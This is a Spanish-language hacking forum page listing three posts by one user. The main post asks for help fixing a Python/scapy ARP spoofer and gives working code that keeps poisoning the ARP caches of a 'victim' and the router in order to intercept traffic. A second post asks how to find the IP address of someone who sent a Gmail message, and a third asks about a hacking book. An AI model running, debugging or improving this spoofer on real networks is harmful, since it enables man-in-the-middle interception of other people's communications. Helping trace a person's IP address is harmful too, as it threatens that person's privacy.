elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Hacking / Problema con software ARP Spoofer en: 17 Enero 2022, 00:01 am
Hola. Estoy programando un arp spoofer en python3 (en visual studio). Tengo un problema con el siguiente código, y es que al mandar el spoof una sola vez sí que cambia el mac del ip del router; pero si lo pongo dos veces (la primera vez para indicarle a la victima que yo soy el router, y la segunda viceversa) como indica el tutorial donde lo aprendí, el mac del router no cambia.

Citar
import scapy.all as scapy
import time

def get_mac(ip):
    arp_request = scapy.ARP(pdst = ip)
    broadcast = scapy.Ether(dst = "ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast / arp_request
    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]

    return answered_list[0][1].hwsrc


def spoof(target_ip, spoof_ip):
    target_mac = get_mac(target_ip)
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet)

while True:
    spoof("(ip de la victima)", "(ip del gateway/router)")
    spoof("ip del gateway/router", "ip de la victima")
    time.sleep(2)
2  Seguridad Informática / Seguridad / Como saber la direccion ip de una persona por Gmail en: 22 Abril 2020, 15:40 pm
Hola gente... necesito saber la dirección IP de una persona que me envió un correo gmail. De hecho ya probé con varios ip tracers pero siempre me dá la dirreción de IP los servidores de google. Saludos.
3  Foros Generales / Dudas Generales / Dudas sobre libros en: 26 Febrero 2020, 00:40 am
Buenos días
El último mes he comprado el libro de RedUsers "El manual del hacker". Para los que hayan leído el libro, me gustaría que me respondieran a esta duda: en el primer proyecto, en una parte antes de empezar la ejecución dice que todos los enlaces a los sitios de descarga de las herramientas estan disponibles en el texto.... a que se refiere específicamente con "en el texto". Porque que yo sepa, en los libros físicos no existen los enlaces.... xd... Gracias, cualquier contribución positiva se agradece.
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines